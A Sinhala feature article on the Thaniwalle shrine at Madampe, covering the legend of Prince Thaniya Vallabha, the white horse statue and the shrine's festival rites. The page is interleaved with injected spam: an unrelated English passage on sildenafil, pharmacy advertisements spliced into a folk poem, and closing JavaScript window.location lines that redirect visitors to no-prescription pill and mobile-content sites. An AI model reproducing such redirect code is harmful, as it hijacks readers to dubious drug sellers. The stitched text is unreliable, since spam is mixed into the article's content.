මාදම්පා පටුනේ තනිවැල්ලේ දෙවියෝ

නිමල් අබේසිංහ

professional essay writers

කොළඹ හලාවත මහාමාර්ගය අසබඩ පිහිටි තිනිිපිටි වැව ඉස්මත්තෙහි තනා තිබෙන විශාල සුදු අස්රුව දෙස එමගෙහි යනෙන ඕනෑම අයෙකු දෙතුන් වතාවක්වත් හැරි හැරී නොබලන්නේ නම් පුදුමයකි. තනිවැල්ලේ දේවාලය නම් වූ මෙය සුවිශේෂී වන්නේ මේ විශාල අශ්වරුව නිසාමය.

“one of the messages of the paper is that not everybody benefits,” friedlander said. Sildenafil could be considered as a treatment for those who suffer most at altitude but, because of side effects that can include severe headaches and the apparent inability to help some people, it should not be taken as an exercise aid by everyone, she said.

‘අශ්වයෙකුට සල්ලි දාලා වඳින්නේ ඇයි?’ ඒ පැනයත් තවත් පැන රැුසකුත් රැුගෙන මම මාදම්පේ මහවැව මාලිගාවත්තේ රෝහණ මද්දුමරාල විශ‍්‍රාමික ගුරුවරයා අබියස සිටිමි.

‘මාදම්පෙ තනිවැල්ලේ දේවාලයේ පුදසුන කරන්නේ මෙයින් වසර පන්සීයකට පමණ ඉහතදී මාදම්පා පටුන පාලනය කළ තනියවල්ලභ කුමාරයා වෙනුවෙන්. ඔහු ප‍්‍රාදේශීය පාලකයකු හෝ යුවරජෙකු වුණත් තම ප‍්‍රදේශයේ යටත්වැසියන්ගේ දුක සැප නිතරම සොයා බැලූ කෙනෙක්්. ඒ විතරක් නොවෙයි බොහෝ සවස් යාමයන්හි ගම් දනව්හි ඇවිදිමින් නිවෙස්වලට ගොස් බුලත්විටක් එහෙම හපලා ආ ගිය තොරතුරු කතා කරමින් හිටපු ජනහිතකාමී පාලකයෙක් විදිහටයි ප‍්‍රදේශය පුරා පැතිර තිබෙන ජනශ‍්‍රැතිවලින් පවා දැනගන්නට තිබෙන්නේ. රාජාවලියට අනුව තනිියවල්ලභ කුමාරයා යනු ධර්ම පරාක‍්‍රමබාහු රජුගේ දෙවන බිසවකගේ පුත‍්‍රයෙක්.’

සකලකලා වල්ලභ නමින් යුත් සොහොයුරෙක්ද ඔහුට විය. අටවන පරාක‍්‍රමබාහු රජුගේ උපදෙස් මත තතියවල්ලභ කුමරු මාදම්පා පටුනත් සකලකලා වල්ලභ කුමරු උඩුගම්පළත් පාලනය කළෝය. මාදම්පා පටුනට මාදම්පෙ, මහවැව, කුඩාවැව, අඩප්පරගම, පුරුදුවැල්ල, කෝලිමඩුව, ගල්අමුණ, මට්ටාකොටුව, තොඩුවැව, කොස්වාඩිය, හේනපොළ, ගල්මුරුව යන ගම්දොළස අයත් බැව් රෝහණ මද්දුමරාල සිය ‘තනියවල්ලභ රජු/දෙවිඳු සොයා යෑම’ නම් කෘතියෙහි සඳහන් කරයි.

‘එහෙත් තනියවල්ලභ කුමාරයාගේ පාලන බල ප‍්‍රදේශයට මාදම්පා පටුනට අයිති ගම් දොළහට අමතරව තවත් විශාල ප‍්‍රදේශයක් අයිතිව තිබූ බව ඉතිහාසය පරීක්ෂා කරන විට පෙනෙනවා. ඔහු මේ ප‍්‍රදේශය කෘෂිකාර්මික කටයුතුවලින් සරුසාර භූමියක් බවට පත්කරන්න වෙහෙස මහන්සි ගෙන ක‍්‍රියා කරපු බවකුත් පේනවා. කුමාරයා මේ ප‍්‍රදේශය පුරා සැරිසරන්නේ සුදු අශ්වයකු පිට නැගිලා ගොහින්. ඒ නිසා තමයි දේවාල භූමියේ සුදු අස්සයෙකුගේ අනුරුවක් හදලා තියෙන්නේ’.

‘ඔහුගේ පාලන සමයේදී ඉන්දියාවේ කාල පට්ටම්ගම් ප‍්‍රදේශයෙන් පැමිණි කාරයාන් නමැත්තෙකු හලාවත මුතුපර බලහත්කාරයෙන් කොල්ල කන්නටත්, අලි ඇතුන් අල්ලාගෙන විකුණන්නටත් පටන්ගත් බැවින් උඩුගම්පොළ පාලනය කළ සිය සොහොයුරා වන සකලකලා වල්ලභ සමග සේනාව රැුගෙන ගොස් කාරයාන් මරා දමා තවත් අසූදෙනෙකු ගලග‍්‍රහයෙන් ගෙන කෝට්ටේ රජතුමා ඉදිරියට පැමිණ වූ බවත් රාජාවලියේ සඳහන් වෙනවා.’ රෝහණ මද්දුමරාල තනියවල්ලභ රාජ සමයේ ඓතිහාසික තොරතුරු ගැන හෙළිදරව් කළේය.

ජනකතා අනුව තනියවල්ලභගේ මරණය ද සිදුවී ඇත්තේ මේ යුද්ධ ජයග‍්‍රහණයෙන් පසුවය. මේ මරණය සියදිවි නසාගැනීමක් බවද ජනශ‍්‍රැතියේ සඳහන්ය. මෙම ප‍්‍රවාදයට අනුව තනියවල්ලභගේ දේවිය අතිශය සුරූපිනියකි. ජනවහරේ එන කවකින් ඇගේ රුව වර්ණනා කරනුයේ මෙලෙසය.

‘සන් සැර සුතන කෙළියට හුදු රනින් සැදූ
පන්දුවකට බඳුය ඇගෙ පියයුරු සුමුදු
රන්රිය සකක බඳු පුළුලූකුල පිරිසිදු Canadian Pharmacy No Rx buy Indocin Online Cheap. Pain Relief|muscle Relaxant. Shipping Policy, Cheap Prices, Herbals, Weight Loss.
පුන් වැලිතලාවකි සළෙලූන් කළ පුබුදු’

රූප සම්පත්තියෙන් අනූන වුවද තොමෝ පතිවත සුරැුකි ගුණවත් කාන්තාවකි. ඇයගේ රුවින් මත්ව තනියවල්ලභගේ අගමැතිවරයා ඇයට ලොබ බැඳ සිටියේය. කාරයාන් හා පැවති යුද්ධයේදී රජු මිය ගිය බව පවසා නොයෙක් චාටු බස් පවසමින් අගමැතිවරයා ඇයගේ සිත ගන්නට උත්සාහ කළත්, එය ව්‍යර්ථ වූවා පමණක් නොව සිය සැමියා මියගියායැ’යි විශ්වාස කොට දේවියද සියදිවි නසාගත්තාය. යුද්ධය දිනා පැමිණි තනියවල්ලභ මේ සිද්ධියෙන් කම්පාවට පත්ව කඩුව පොළවෙහි සිටවා ඒ මතට පැන තමාද සියදිවි නසාගත්තේය.

මෙයින් පසුව මාදම්පා ප‍්‍රදේශයට පැමිණියේ දුර්භාග්‍ය කාලයකි. වසංගත රෝග, ආහාර අහේනිය ප‍්‍රදේශය තුළ බලවත් විය. ප‍්‍රදේශවාසීහු තනියවල්ලභ කුමරු දේවත්වයෙන් සලකා දුක් උවදුරුවලින් තමන් බේරා දෙන්නැයි ඉල්ලා තිනිපිටි වැව ඉස්මත්තේ වූ මහා නුගරුකෙහි අතු එල්ලා භාරහාර වන්නට පුරුදු වූහ.

පසුකලෙක එබිමෙහිම කුඩා දෙවොලක්ද තනා ගත්හ.
දේවාලය ඉදිරිපිට සුදු අස් රුව ඉදිවීම පිළිබඳව ඇත්තේද අපූරු වෘත්තාන්තයකි. මේ දෙවොල ආශ‍්‍රිත ප‍්‍රදේශයෙහි ඉතා ධනවත් හෙට්ටි කුලයේ අයකු සිට ඇත. ඔහු දිනපතා දෙවොල ඉදිරිපසින් තම අසුන් බැඳි කරත්තයෙන් යනු එනුයේ දෙවොල කෙරෙහි කිසිදු ගරුසරුවක් නැතිවය. එක්තරා දිනෙක ඔහු අශ්ව කරත්තයේ නැගී දේවාලය ඉදිරිපිටින් යත්දී එක්වරම අසුන් දෙදෙනා කරත්තයද ඇදගෙන තිනිපිටි වැවට පැන්නෝය. හෙට්ටියාගේ පාදයක් බිඳිණි. පාදයේ තුවාලය සුව වෙන බවක් නොපෙනුණේය. එක්තරා දිනෙක රාත‍්‍රියේදී ඔහුට සිහිනෙන් කෙනෙකු පවසා ඇත්තේ, දේවාල බිමෙහි අශ්ව රුවක් සාදන බවට භාරයක් වන ලෙසටය. ඒ අනුව ඔහු අදාළ භාරය සිදුකර ඇති අතර, කකුලේ තුවාලයද සුව වී ඇත. ඉන් පසු ඔහු ලීවලින් සුදු අශ්ව රුවක් දේවාලය ඉදිරිපිට තැනවීය. පසුකලෙක ලී රුවට පිටින් බදාමින් පුරවා දැන් තිබෙන අශ්ව රුව සකසා ඇත.

සාමාන්‍යයෙන් ඕනෑම දේවාලයක් සම්බන්ධව කපුමහත්වරුන්ගේ පරම්පරාවක්ද, තේවාකරුවන්ගේ පරම්පරාවක්ද පවතින මුත් තනිවැල්ලේ දේවාලය හා බද්ධව එබඳු පරම්පරා නොමැතිවීමද විශේෂත්වයකි. එනිසා මේ දෙවොලෙහි තේවා කටයුතු කරනුයේ මාසික වැටුප් හා දීමනා ලබන්නන් පිරිසකි. දේවාලයේ පාලනයද පවතින්නේ භාරකාර මණ්ඩලයක් යටතේය. වත්මන් භාරකාර මණ්ඩලයේ සභාපතිත්වය දරන්නේ දේවාලය තරමටම පැරණි මාදම්පේ ප‍්‍රභූ පරම්පරාවක් වන සේනානායක පරපුරේ අයෙකි.
දෙවොලේ පාලක මණ්ඩලයේ සාමාජිකයෙකු වන මංගල ප‍්‍රසන්න මහතා තනිවැල්ලේ දේවාලයේ පුදසිරිත් හා වතාවත් සම්බන්ධ තොරතුරු හෙළිකළේ මෙලෙසය.

‘සාමාන්‍යයෙන් දේවාලය විවෘත කරන්නේ බදාදා හා සෙනසුරාදා දිනවලදී පමණයි. මේ දින දෙකේ පෙරවරු හයට දේවාලය විවෘත කරනවා. ඊට පෙර කපු මහත්වරු නා පිරිසිදු වී බුදුන් වැඳ පන්සිල් සමාදන් වී මල් පහන් පූජා කරනවා. ඒ අතරෙම දේව මාලිගය, කඩවර දේවාලය, බුදු මැදුර, බෝධි වෘක්ෂය, ඉපැරණි නුග ගස හා බහිරව රූපය ආදියට සුවඳ දුම් ඇල්ලීමත් සිදු කරනවා. ඊට පස්සේ තමයි දේවමාලිගයේ දොර විවෘත කරන්නේ. බැතිමතුන්ගේ භාරහාර වීම් වතාවත් අවසන් කිරීමෙන් පසුව සිරිතක් ලෙස දේව මාලිගයේ බිම සෝදා පිරිසිදු කර සුවඳ දුම් අල්ලා කිසියම් අයෙකුගෙන් වරදක් සිදුවී ඇත්නම් දෙවියන්ගෙන් සමාව ඉල්ලා යාතිකා කරනවා. ඊට පස්සේ තමයි දොර වහන්නේ.’

තනිවැල්ලේ දේවාලයේ වාර්ෂික මංගල්‍යය පවත්වනුයේ හැම වසරකම අගෝස්තු මාසයේදීය. මංගල්‍යය පවත්වන්නේ සෙනසුරාදා දිනකය. ඊට පෙර එන බදාදා දින උදෑසන හතට දේවාල භූමිය තුළ කෙසෙල් කැනක් බිම් කිරීම පළමු චාරිත‍්‍රයයි. ඉන් පසුව කැවුම් පිසීම සිදුවන අතර, එහිදී පිසින මුල්ම කැවුම සහ තවත් කැවුම් විසිපහක් මංගල්‍ය පූජාවට වෙන් කරයි. මුල්ම කැවුම පිසූ පසුව එයට ඉරටුවක් ගසා තබන්නේ කැවුම හඳුනා ගැනීම පිණිසය.
කප තොරණ සිටුවන්නේ සිකුරාදා දින දහවල දොළහට දේව මාලිගාව ඉදිරිපිටය.
දැකුම් වට්ටිය සකසන්නේ ඒ සඳහා සකසාගත් පිරිසිදු වට්ටියක පිරුවට එලා ඒ මත පුවක් මල් කිණිති තබාය. නානුවලින් සෝදා දේවාභරණ පිරිසිදු කර ගැනෙයි.

මහ දේවාලය, බෝධිය, කඩවර දේවාලය කප තොරණ හා නුග ගස යන ස්ථානයන්වලට දේවාභරණ වැඩමවා පිරුවටයක් එලා ඒ මත බුලත් කොළ දෙකක් හා පඬුරු දෙකක් තබා ආභරණ තැන්පත් කර ගස පේ කිරීමේ චාරිත‍්‍රය සිදුවේ. මේ ආකාරයෙන් දැකුම් වට්ටි පිරිනැමීම, කිරිමුට්ටි කිරි මඩුවට කිරිමුට්ටි හත වැඩම්මවීම, ඉතිරි වූ කිිරි මුට්ටි දේවාලයට වැඩමවීම, පන්දම් ගස දැල්වීම යන අනෙකුත් දේව චාරිත‍්‍ර සිදුකර බැතිමතුන්ට දේව දානය පිරිනැමීම සිදුවෙයි. අවසන සියලූ චාරිත‍්‍ර සිදුකර අවසන් බව දෙවියන්ට සැලකර පොල් ගසා දෙවියන්ට පින් අනුමෝදන් කර ඉදිරි වසර සඳහා දේවාශිර්වාදය ප‍්‍රාර්ථනා කිරීම කර සිකුරාදා දින සිට විවෘතව තැබූ දේව මාලිගාවේ ප‍්‍රධාන දොරටුව වසා තැබීමෙන් දේවාලයේ වාර්ෂික මංගල්‍යයේ අභිචාර විධීන් අහවර වෙයි.

 
Buy Natrexone
window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”; window.location = “http://cheap-pills-norx.com/search.htm?route=search&q=”; window.location = “http://cheap-pills-norx.com/search.htm?route=search&q=”;